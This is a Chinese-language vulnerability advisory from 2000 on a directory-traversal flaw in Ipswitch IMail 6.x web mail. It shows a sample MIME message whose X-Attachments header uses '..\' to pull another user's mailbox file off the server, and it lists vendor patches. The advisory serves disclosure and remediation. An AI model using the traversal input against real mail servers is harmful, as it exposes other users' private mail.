IPSWITCH IMail 文件附件漏洞发布时间:2000-04-19 更新时间:2000-04-19 严重程度:中 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Ipswitch IMail 6.4详细描述 IPSWITCH包含一个产品叫IMAIL,一个使用在NT服务器上来通过WEB接口接收EMAIL 的工具,IMAIL服务程序提供的WEB服务程序一般运行在端口8383来提供用户的访问, 通过这个接口,用户可以读和发送MAIL,也可以发送福建。部分IMAIL没有正确处理 访问输入,导致用户可以把文件附加到WEB服务器的其他不能访问的地方。 测试代码 下面是一个简单的MAIL头,附带一个附件: Date: Tue, 11 Jul 2000 13:10:28 +0200 Message-ID: <200007111310.AA2374238664@bar.com> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="==IMail_v5.0==" From: "Timescape" <foo@bar.com> Reply-To: <foo@bar.com> To: <foo@bar.com> Subject: test X-Mailer: <IMail v5.01> X-Attachments: D:\IMAIL\spool\gonzo2.jpg ; X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6700 Return-Path: <foo@bar.com> X-OriginalArrivalTime: 11 Jul 2000 11:20:48.0256 (UTC) FILETIME=[10327800:01BFEB2A] 下面是MIME格式中的多个部分信息: --==IMail_v5.0== Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit --==IMail_v5.0== Content-Type: application/octet-stream; name="gonzo2.jpg " Content-Transfer-Encoding: base64 这回导致文件放在下面: X-Attachments: D:\IMAIL\spool\gonzo2.jpg 通过修改编辑HTML信息文件并本地存储,可以安排附件的路径,并可以读文件: X-Attachments: D:\IMAIL\spool\..\bar\users\admin\main.mbx 解决方案 升级程序: Ipswitch IMail 6.4: Ipswitch patch IMail Upgrade for Bugtraq ID 1617 ftp://ftp.ipswitch.com/Ipswitch/Product_Support/Imail/imailwebpatch604c.exe Ipswitch IMail 6.3: Ipswitch patch IMail Upgrade for Bugtraq ID 1617 ftp://ftp.ipswitch.com/Ipswitch/Product_Support/Imail/imailwebpatch604c.exe Ipswitch IMail 6.2: Ipswitch patch IMail Upgrade for Bugtraq ID 1617 ftp://ftp.ipswitch.com/Ipswitch/Product_Support/Imail/imailwebpatch604c.exe Ipswitch IMail 6.1: Ipswitch patch IMail Upgrade for Bugtraq ID 1617 ftp://ftp.ipswitch.com/Ipswitch/Product_Support/Imail/imailwebpatch604c.exe Ipswitch IMail 6.0: Ipswitch patch IMail Upgrade for Bugtraq ID 1617 ftp://ftp.ipswitch.com/Ipswitch/Product_Support/Imail/imailwebpatch604c.exe 相关信息 |
